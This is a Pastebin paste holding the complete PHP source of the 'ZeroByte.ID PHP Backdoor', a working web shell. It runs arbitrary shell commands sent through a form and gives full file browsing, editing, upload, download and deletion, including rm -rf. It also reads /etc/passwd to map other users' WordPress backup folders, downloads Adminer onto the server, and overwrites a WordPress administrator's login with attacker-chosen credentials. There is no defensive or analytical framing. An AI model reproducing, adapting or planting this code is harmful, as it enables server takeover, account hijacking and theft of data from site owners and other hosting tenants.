Advertisement
Guest User

Untitled

a guest
Jul 16th, 2019
168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.96 KB | None | 0 0
  1. <?php
  2. function exect($cmd) {
  3. if(function_exists('system')) {
  4. @ob_start();
  5. @system($cmd);
  6. $exect = @ob_get_contents();
  7. @ob_end_clean();
  8. return $exect;
  9. } elseif(function_exists('exec')) {
  10. @exec($cmd,$results);
  11. $exect = "";
  12. foreach($results as $result) {
  13. $exect .= $result;
  14. } return $exect;
  15. } elseif(function_exists('passthru')) {
  16. @ob_start();
  17. @passthru($cmd);
  18. $exect = @ob_get_contents();
  19. @ob_end_clean();
  20. return $exect;
  21. } elseif(function_exists('shell_exec')) {
  22. $exect = @shell_exec($cmd);
  23. return $exect;
  24. }
  25. }
  26.  
  27.  
  28. function fperms($filen) {
  29. $perms = fileperms($filen);
  30. $fpermsinfo .= (($perms & 0x0100) ? 'r' : '-');
  31. $fpermsinfo .= (($perms & 0x0080) ? 'w' : '-');
  32. $fpermsinfo .= (($perms & 0x0040) ?
  33. (($perms & 0x0800) ? 's' : 'x' ) :
  34. (($perms & 0x0800) ? 'S' : '-'));
  35. $fpermsinfo .= (($perms & 0x0020) ? 'r' : '-');
  36. $fpermsinfo .= (($perms & 0x0010) ? 'w' : '-');
  37. $fpermsinfo .= (($perms & 0x0008) ?
  38. (($perms & 0x0400) ? 's' : 'x' ) :
  39. (($perms & 0x0400) ? 'S' : '-'));
  40. $fpermsinfo .= (($perms & 0x0004) ? 'r' : '-');
  41. $fpermsinfo .= (($perms & 0x0002) ? 'w' : '-');
  42. $fpermsinfo .= (($perms & 0x0001) ?
  43. (($perms & 0x0200) ? 't' : 'x' ) :
  44. (($perms & 0x0200) ? 'T' : '-'));
  45. echo '<center><small>'.$fpermsinfo.'</small></center>';
  46. }
  47.  
  48. ?>
  49. <title>ZeroByte.ID PHP Backdoor</title>
  50. <link href='//fonts.googleapis.com/css?family=Share+Tech+Mono' rel='stylesheet' type='text/css'>
  51. <style type="text/css">
  52. body {
  53. font-family: courier;
  54. background: #f2f2f2;
  55. font-size: 1px;
  56. }
  57. h1 a {
  58. font-weight: normal;
  59. font-family: 'Share Tech Mono';
  60. font-size: 20px;
  61. color:#006600;
  62. text-decoration: none;
  63. margin: 0px;
  64. }
  65. h2 {
  66. font-size: 20px;
  67. color: #006600;
  68. text-align: center;
  69. padding-top: 5px;
  70. margin: 0;
  71. margin-top: 10px;
  72. }
  73. .menu {
  74. text-align: center;
  75. font-size: 12px;
  76. border-bottom: 1px dashed #006600;
  77. padding-bottom: 5px;
  78. margin-bottom: 10px;
  79. }
  80. .menu a {
  81. margin-top: 2px;
  82. color: #006600;
  83. text-decoration: none;
  84. display: inline-block;
  85. }
  86. .container {
  87. font-size: 12px;
  88. }
  89. .filemgr {
  90. font-size: 12px;
  91. width: 100%
  92. }
  93. .filemgr td {
  94. padding: 3px;
  95. border-bottom: 1px dashed #006600;
  96. }
  97. .filemgr a{
  98. text-decoration: none;
  99. color:#006600;
  100. }
  101. tr:hover {
  102. background: #cccccc;
  103. }
  104. .tdtl {
  105. background:#006600;color:#ffffff;text-align:center;font-weight:bold;
  106. }
  107. .footer {
  108. text-align: center;
  109. border-radius: 30px;
  110. margin-top: 25px;
  111. border-top: 1px double #006600;
  112. padding: 5px;
  113. }
  114. .footer a {
  115. color: #006600;
  116. text-decoration: none;
  117. }
  118. p {
  119. word-wrap: break-word;
  120. margin:2;
  121. }
  122. a {
  123. text-decoration: none;
  124. color: #006600;
  125. }
  126. .act {
  127. text-align: center;
  128. }
  129. .txarea {
  130. width:100%;
  131. height:200px;
  132. background:transparent;
  133. border:1px solid #006600;
  134. padding:1px;color:#006600;
  135. }
  136. </style>
  137. <div class="container">
  138. <div style="position:relative;width: 100%;margin-bottom: 5px;border-bottom: 1px dashed #006600;">
  139. <div style="float: left;width: 15%;text-align: center;border: 1px dashed #006600;margin-bottom: 5px;">
  140. <h1><a href="?">ZeroByte Shell<br><small>V 1.2 (Beta)</small></a></h1>
  141. </div>
  142. <div style="float: right;width: 83%;">
  143. <?php
  144. echo php_uname();
  145. $mysql = (function_exists('mysql_connect')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  146. $curl = (function_exists('curl_version')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  147. $wget = (exect('wget --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  148. $perl = (exect('perl --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  149. $gcc = (exect('gcc --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  150. $disfunc = @ini_get("disable_functions");
  151. $show_disf = (!empty($disfunc)) ? "<font color=red>$disfunc</font> <a href='?bypass=killdiscfunc' style='text-decoration:none;color:#0000FF;font-weight: bold;'>[ KILL ME ]</a>" : "<font color=#006600>NONE</font>";
  152. echo '<br>[ MySQL: '.$mysql.' ][ Curl: '.$curl.' ][ Wget: '.$wget.' ][ Perl: '.$perl.' ][ Compiler: '.$gcc.' ]';
  153. echo '<p>Disable Function: '.$show_disf;
  154.  
  155. ?>
  156. </div>
  157. <div style="clear: both;" ="clear"></div>
  158. </div>
  159.  
  160. <?php
  161.  
  162. if(empty($_GET)) {
  163. $dir = getcwd();
  164. }
  165. else {
  166. $dir = $_GET['path'];
  167. }
  168.  
  169. if(!empty($_GET['path'])) {$offdir = $_GET['path'];}
  170. else if(!empty($_GET['file'])) {$offdir = dirname($_GET['file']);}
  171. else if(!empty($_GET['lastpath'])) {$offdir = $_GET['lastpath'];}
  172. else {$offdir = getcwd();}
  173.  
  174. ?>
  175. <div class="menu">
  176. <a href="?ext=backupwordpress&lastpath=<?php echo $offdir;?>">[ Jumping Backup Wordpress ]</a>
  177. <a href="?ext=sql_interface&lastpath=<?php echo $offdir;?>">[ MySQL Interface ]</a>
  178. <a href="?ext=shellcmd&lastpath=<?php echo $offdir;?>">[ Shell Command ]</a>
  179. <a href="?ext=uploader&lastpath=<?php echo $offdir;?>">[ Uploader ]</a>
  180. </div>
  181. <?php
  182. ## CURRENT DIR ##
  183.  
  184. echo '<div style="margin-bottom:10px;">';
  185. echo '<span style="border:1px dashed #009900;padding:2px;">';
  186. $lendir = str_replace("\\","/",$offdir);
  187. $xlendir = explode("/", $lendir);
  188. foreach($xlendir as $c_dir => $cdir) {
  189. echo "<a href='?path=";
  190. for($i = 0; $i <= $c_dir; $i++) {
  191. echo $xlendir[$i];
  192. if($i != $c_dir) {
  193. echo "/";
  194. }
  195. }
  196. echo "'>$cdir</a>/";
  197. }
  198. echo '</span></div>';
  199. ## EOF CURRENT DIR ##
  200.  
  201. if(!empty($dir)) {
  202. echo '<table class="filemgr">';
  203. echo '<tr><td class="tdtl">Name</td><td class="tdtl" width="9%">Permission</td><td class="tdtl" width="18%">Action</td></tr>'."\n";
  204. $directories = array();
  205. $files_list = array();
  206. $files = scandir($dir);
  207. foreach($files as $file){
  208. if(($file != '.') && ($file != '..')){
  209. if(is_dir($dir.'/'.$file)){
  210. $directories[] = $file;
  211.  
  212. } else{
  213. $files_list[] = $file;
  214.  
  215. }
  216. }
  217. }
  218.  
  219. foreach($directories as $directory){
  220. echo '<tr><td><span class="dbox">[D]</span> <a href="?path='.$dir.'/'.$directory.'">'.$directory.'/</a></td>'."\n";
  221. echo '<td>';
  222. fperms($dir.'/'.$directory);
  223. echo '</td>'."\n";
  224. echo '<td class="act">';
  225. echo '<a href="?action=rename&file='.$dir.'/'.$directory.'" class="act">RENAME</a> ';
  226. echo '<a href="?action=rmdir&file='.$dir.'/'.$directory.'" class="act">DELETE</a>';
  227. echo '</td>'."\n";
  228. echo '</tr>'."\n";
  229. }
  230. foreach($files_list as $filename){
  231. if(preg_match('/(tar.gz)$/', $filename)) {
  232. echo '<tr><td><span class="dbox">[F]</span> <a href="#" class="act">'.$filename.'</a>'."\n";
  233. echo ' <a href="?ext=extract2tmp&gzname='.$dir.'/'.$filename.'" style="background:#006600;color:#ffffff;padding:1px;padding-left:5px;padding-right:5px;">EXTRACT TO TMP</a>';
  234. echo '</td>'."\n";
  235. echo '<td>';
  236. fperms($dir.'/'.$filename);
  237. echo '</td>'."\n";
  238. echo '<td class="act">';
  239. echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> ';
  240. echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> ';
  241. echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>';
  242. echo '</td>'."\n";
  243. echo '</tr>'."\n";
  244. }
  245. else {
  246. echo '<tr><td><span class="dbox">[F]</span> <a href="?action=view&file='.$dir.'/'.$filename.'" class="act">'.$filename.'</a></td>'."\n";
  247. echo '<td>';
  248. fperms($dir.'/'.$filename);
  249. echo '</td>'."\n";
  250. echo '<td class="act">';
  251. echo '<a href="?action=edit&file='.$dir.'/'.$filename.'" class="act">EDIT</a> ';
  252. echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> ';
  253. echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> ';
  254. echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>';
  255. echo '</td>'."\n";
  256. echo '</tr>'."\n";
  257. }
  258. }
  259. echo '</table>';
  260. }
  261.  
  262.  
  263. if($_GET['action'] == 'edit') {
  264. if($_POST['save']) {
  265. $save = file_put_contents($_GET['file'], $_POST['src']);
  266. if($save) {
  267. $act = "<font color=#006600>Successed!</font>";
  268. } else {
  269. $act = "<font color=red>Permission Denied!</font>";
  270. }
  271. echo "".$act."<br>";
  272. }
  273. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  274. echo "<form method='post'>
  275. <textarea name='src' class='txarea'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  276. <input type='submit' value='Save' name='save' style='width: 20%;background:#006600;border:none;color:#f2f2f2;margin-top:5px;height:30px;'>
  277. </form>";
  278. }
  279. else if($_GET['action'] == 'view') {
  280. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  281. echo "<textarea class='txarea' style='height:400px;' readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  282. }
  283. else if($_GET['action'] == 'rename') {
  284. $path = $offdir;
  285. if($_POST['do_rename']) {
  286. $rename = rename($_GET['file'], "$path/".htmlspecialchars($_POST['rename'])."");
  287. if($rename) {
  288. $act = "<font color=#006600>Successed!</font>";
  289. } else {
  290. $act = "<font color=red>Permission Denied!</font>";
  291. }
  292. echo "".$act."<br>";
  293. }
  294. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  295. echo "<form method='post'>
  296. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  297. <input type='submit' name='do_rename' value='rename'>
  298. </form>";
  299. }
  300. else if($_GET['action'] == 'delete') {
  301. $path = $offdir;
  302. $delete = unlink($_GET['file']);
  303. if($delete) {
  304.  
  305. } else {
  306. $act = "<font color=red>Permission Denied!</font>";
  307. }
  308. echo $act;
  309. } else if($_GET['action'] == 'rmdir') {
  310. $path = $offdir;
  311. $delete = rmdir($_GET['file']);
  312. if($delete) {
  313. echo '<font color=#006600>Deleted!</font><br>';
  314. } else {
  315. echo "\n<font color=#006600>Try Force Delete!</font>\n<br>";
  316. exect('rm -rf '.$_GET['file']);
  317. if(file_exists($_GET['file'])) {
  318. echo '<font color=red>Permission Denied!</font>';
  319. } else
  320. {
  321. echo '<font color=#006600>Deleted!</font>';
  322. }
  323. }
  324.  
  325. } else if($_GET['action'] == 'download') {
  326. @ob_clean();
  327. $file = $_GET['file'];
  328. header('Content-Description: File Transfer');
  329. header('Content-Type: application/octet-stream');
  330. header('Content-Disposition: attachment; filename="'.$file.'"');
  331. header('Expires: 0');
  332. header('Cache-Control: must-revalidate');
  333. header('Pragma: public');
  334. header('Content-Length: ' . filesize($file));
  335. readfile($file);
  336. exit;
  337. }
  338.  
  339. if($_GET['ext'] == 'backupwordpress') {
  340. echo '<h2>.::[ Jumping From Backup Wordpress ]::.</h2>';
  341. $i = 0;
  342. echo "<pre><div class='margin: 5px auto;'>";
  343. $etc = fopen("/etc/passwd", "r");
  344. while($passwd = fgets($etc)) {
  345. if($passwd == '' || !$etc) {
  346. echo "<center><font color=red>Can't read /etc/passwd</font></center>";
  347. } else {
  348. preg_match_all('/(.*?):x:/', $passwd, $user);
  349. foreach($user[1] as $users) {
  350. $user_dir = "/home/$users/backupwordpress";
  351. if(is_readable($user_dir)) {
  352. $i++;
  353. $jrw = "[R] <a href='?path=$user_dir'>/home/$users/backupwordpress</a>";
  354. if(is_writable($user_dir)) {
  355. $jrw = "[RW] <a href='?path=$user_dir'>/home/$users/backupwordpress</a>";
  356. }
  357. echo $jrw."\n";
  358.  
  359. }
  360. }
  361. }
  362. }
  363. if($i == 0) {
  364. echo '<center><font color=red>backupwordpress is null in this host!</font></center>';
  365. } else {
  366. echo "<br>Total ".$i." Users in ".gethostbyname($_SERVER['HTTP_HOST'])."";
  367. }
  368. echo "</div></pre>";
  369. }
  370.  
  371. ### EXTRACTOR TO TMP ###
  372. else if($_GET['ext'] == 'extract2tmp')
  373. {
  374. if (file_exists($_SERVER["DOCUMENT_ROOT"].'/tmp/') && is_writable($_SERVER["DOCUMENT_ROOT"].'/tmp/')) {
  375. $tmppath = $_SERVER["DOCUMENT_ROOT"].'/tmp/';
  376. }
  377. else if(file_exists(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/') && is_writable(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/')) {
  378. $tmppath = dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/';
  379. }
  380. else if(file_exists('/tmp/') && is_writable('/tmp/')) {
  381. $tmppath = '/tmp/';
  382. }
  383. else {
  384. $tmppath = '';
  385. }
  386.  
  387. if(!empty($tmppath)) {
  388. $gzfile = $_GET['gzname'];
  389. echo '[FILE] '.$gzfile.'<br>';
  390. echo '-- extract to --<br>';
  391. echo '[TMP] '.$tmppath.'<br>';
  392. $bsname = basename($gzfile);
  393. $gzrname = explode(".", $bsname);
  394. echo '<form method="post" action="">';
  395. echo '<input name="extract" type="submit" value="EXTRACT">';
  396. echo '</form>';
  397. if(!empty($_POST['extract'])) {
  398. exect('mkdir '.$tmppath.$gzrname[0]);
  399. $destdir = $tmppath.$gzrname[0];
  400. if (file_exists($destdir) && is_writable($destdir)) {
  401. echo "\n".'[EXTRACTED] <a href="?path='.$destdir.'">'.$destdir.'</a>'."\n";
  402. exect('tar -xzvf '.$gzfile.' -C '.$destdir);
  403. }
  404. else
  405. {
  406. echo 'FAILED!';
  407. }
  408. }
  409. }
  410. else {
  411. echo 'CANNOT EXTRACT TO TMP!';
  412. }
  413.  
  414. }
  415. ### EXTRACTOR TO TMP - EOF ###
  416.  
  417. ### CMD ###
  418. else if($_GET['ext'] == 'shellcmd')
  419. {
  420. echo '<h2>.::[ Shell Command ]::.</h2>';
  421. echo '<form method="post" action="">';
  422. echo 'terminal:~$ <input name="cmd" type="text" placeholder="echo zerobyte" style="width:300px"/>';
  423. echo ' <input type="submit" value=">>"/>';
  424. echo '</form>';
  425. if(!empty($_POST['cmd'])) {
  426. echo '<textarea style="width:100%;height:150px;" readonly>';
  427. $cmd = $_POST['cmd'];
  428. echo exect($cmd);
  429. echo '</textarea>';
  430. }
  431. }
  432. ### CMD EOF ###
  433.  
  434. ### UPLOADER ###
  435. else if($_GET['ext'] == 'uploader')
  436. {
  437. echo '<h2>.::[ Uploader ]::.</h2>';
  438. echo '<center>';
  439. echo '<form method=post enctype=multipart/form-data>';
  440. echo '<br><br>PATH ['.$offdir.']<br>';
  441. echo '<input type="file" name="zerofile"><input name="postupl" type="submit" value="Upload"><br>';
  442. echo '</form>';
  443. if($_POST["postupl"] == 'Upload')
  444. {
  445. if(@copy($_FILES["zerofile"]["tmp_name"],"$offdir/".$_FILES["zerofile"]["name"]))
  446. { echo '<b>OK! '."$offdir/".$_FILES["zerofile"]["name"].'</b>'; }
  447. else
  448. { echo '<b>Upload Failed.</b>'; }
  449. }
  450. echo '</center>';
  451. }
  452. ### UPLOADER EOF ###
  453.  
  454. ### MYSQL INTERFACE ###
  455. else if($_GET['ext'] == 'sql_interface')
  456. {
  457. echo '<h2>.::[ MySQL Interface ]::.</h2>';
  458. echo '<center>';
  459. $dwadminer = 'https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php';
  460. $fileadminer = 'z-adminer.php';
  461. function call_adminer($dwadminer, $fileadminer) {
  462. $fp = fopen($fileadminer, "w+");
  463. $ch = curl_init();
  464. curl_setopt($ch, CURLOPT_URL, $dwadminer);
  465. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  466. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  467. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  468. curl_setopt($ch, CURLOPT_FILE, $fp);
  469. return curl_exec($ch);
  470. curl_close($ch);
  471. fclose($fp);
  472. ob_flush();
  473. flush();
  474. file_put_contents($dwadminer, $fileadminer);
  475. }
  476. echo '<form method=post enctype=multipart/form-data>';
  477. echo '<input name="mysql_int" type="submit" value="Call Adminer 4.3.1"><br>';
  478. echo '</form>';
  479. if($_POST['mysql_int'] == 'Call Adminer 4.3.1') {
  480. call_adminer($dwadminer, $fileadminer);
  481. $linkz = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]";
  482. if(file_exists('z-adminer.php')) {
  483. echo '<a href="'.$linkz.dirname($_SERVER['PHP_SELF']).'/'.$fileadminer.'" target="_blank">Adminer OK!</a>';
  484. }
  485. else {
  486. echo '<font color="red">[FAILED]</a>';
  487. }
  488.  
  489. }
  490. echo '</center>';
  491. }
  492. ### MYSQL INTERFACE EOF ###
  493.  
  494.  
  495. ### TAMBAHAN BACKUPWORDPRESS BASH ###
  496. if($_GET['grab'] == 'wp_options') {
  497. $userdb = $_POST['wpuser'];
  498. $passdb = $_POST['wppass'];
  499. $namedb = $_POST['wpdb'];
  500. $hostdb = $_POST['wphost'];
  501. echo 'WP_OPTIONS';
  502. if(!empty($userdb)) {
  503. $link = mysql_connect($hostdb, $userdb, $passdb);
  504. if (!$link) {die('Could not connect: ' . mysql_error());}
  505. if (!mysql_select_db($namedb)) {die('Could not select database: ' . mysql_error());}
  506. //
  507. $tblz = mysql_query("SELECT table_name FROM information_schema.tables WHERE table_schema='".$namedb."' AND table_name LIKE '%_options' LIMIT 1");
  508. if (!$tblz) {die('Could not query:' . mysql_error());}
  509. $tbl = mysql_result($tblz, 0, 'table_name'); // outputs third employee's name
  510. $result = mysql_query("SELECT option_value FROM ".$tbl." WHERE option_name = 'siteurl' AND option_id = '1'");
  511. if (!$result) {die('Tbl Could not query:' . mysql_error());}
  512. echo "\n".'[DOMAIN] '.mysql_result($result, 0, 'option_value')."\n"; // outputs third employee's name
  513. mysql_close($link);
  514. }
  515. } else if($_GET['grab'] == 'wp_users_updt') {
  516. $userdb = $_POST['wpuser'];
  517. $passdb = $_POST['wppass'];
  518. $namedb = $_POST['wpdb'];
  519. $hostdb = $_POST['wphost'];
  520. $prefix = $_POST['tpfx'];
  521. echo 'WP_USERS';
  522. $conn = new mysqli($hostdb, $userdb, $passdb, $namedb);
  523. if ($conn->connect_error) {
  524. die("Connection failed: " . $conn->connect_error);
  525. }
  526. $sql = "UPDATE ".$prefix."users SET user_login = 'bedzns', user_pass = MD5('bedzns') WHERE user_status = '0' LIMIT 1";
  527. if ($conn->query($sql) === TRUE) {
  528. echo "Record updated successfully";
  529. } else {
  530. echo "Error updating record: " . $conn->error;
  531. }
  532. $conn->close();
  533. }
  534. ### TAMBAHAN BACKUPWORDPRESS BASH EOF ###
  535.  
  536.  
  537.  
  538. ### FOOTER ###
  539. echo '<div class="footer">';
  540. echo '&copy; 2017 <a href="https://zerobyte.id/ rel="nofollow" target="_blank">ZeroByte.ID</a>';
  541. echo '</div>';
  542. echo '</div>';
  543. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement